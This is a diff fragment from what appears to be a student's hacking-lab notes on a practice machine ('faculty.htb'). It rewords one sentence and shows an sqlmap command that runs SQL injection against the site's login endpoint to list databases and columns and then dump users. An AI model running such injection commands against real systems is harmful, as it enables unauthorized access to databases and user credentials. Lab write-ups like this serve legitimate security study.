pojntfx/uni-hacking-notes/docs/main.md

 # ...
 ```

-Now we try to first enumerate the columns, then dump users:
+In order to find out more about the structure of the application, I used `sqlmap` to first enumerate the columns and then dump the users.

 ```shell
 $ sqlmap -u 'http://faculty.htb/admin/ajax.php?action=login_faculty' --data="id_no=asdf" --method POST --dbs --batch -time-sec=1 --columns --threads 10